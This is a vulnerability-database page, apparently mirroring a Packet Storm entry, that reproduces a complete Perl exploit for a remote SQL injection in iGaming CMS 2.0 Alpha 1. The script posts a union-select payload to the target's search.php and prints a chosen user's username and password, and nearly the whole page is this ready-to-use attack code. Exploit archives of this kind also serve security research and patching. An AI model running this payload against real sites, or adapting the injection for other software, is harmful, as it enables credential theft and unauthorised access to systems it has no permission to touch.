Lucene search

K

igaming20-sql.txt

🗓️ 17 Oct 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit, October 16, 200

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl   
# -----------------------------------------------------  
# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit  
# By StAkeR aka athos - StAkeR[at]hotmail[dot]it  
# On 16/10/2008  
# http://www.igamingcms.com/iGaming_2_Alpha.zip  
# -----------------------------------------------------  
  
use strict;  
use LWP::UserAgent;  
  
  
my ($host,$id) = @ARGV;  
  
usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;  
  
my $etc = "' union select 1,concat(0x616E6172636879,".  
"password,0x3a,username,0x616E6172636879),3".  
",4,5 from sp_users where id=$id#";  
  
my @search = ($etc,'all',0,'Search','search_games');   
my @split = undef;   
  
my $http = new LWP::UserAgent;  
my $post = $http->post($host.'/search.php',  
[  
keywords => $search[0],  
platform => $search[1],  
exact => $search[2],  
submit => $search[3],  
do => $search[4]  
]);  
  
if($post->is_success)  
{  
if($post->as_string =~ /anarchy(.+?)anarchy/)  
{  
@split = split(':',$1);  
  
print "Username: $split[0]\r\n";  
print "Password: $split[1]\r\n";  
}  
else  
{  
print "Exploit Failed!\r\n";  
}  
}  
  
sub usage  
{  
print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";  
print "Usage: perl $0 http://[host] [user_id]\r\n";  
exit;  
}  
  
  
  
__END__   
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report